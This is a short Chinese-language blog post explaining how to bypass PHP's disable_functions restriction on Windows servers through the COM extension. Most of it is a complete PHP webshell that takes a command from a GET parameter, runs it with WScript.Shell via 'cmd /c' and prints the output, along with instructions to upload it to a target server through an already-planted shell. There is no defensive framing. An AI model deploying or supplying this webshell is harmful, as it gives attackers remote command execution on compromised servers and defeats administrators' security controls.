WindowsCom组件绕过disable_function的方法

发表于 分类于 不明生物:

window com组件(php 5.4)(高版本扩展要自己添加)

条件:要在php.ini中开启(如图)

利用代码,利用shell上传如下代码到目标服务器上

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php

$command=$_GET['a'];

$wsh = new COM('WScript.shell'); // 生成一个COM对象 Shell.Application也能

$exec = $wsh->exec("cmd /c ".$command); // 调用对象方法来执行命令

$stdout = $exec->StdOut();

$stroutput = $stdout->ReadAll();

echo $stroutput;

?>

利用成功后的结果

原文:PHP Webshell下绕过disable_function的方法

关注作者公众号,获取更多资源!
赏作者一杯咖啡~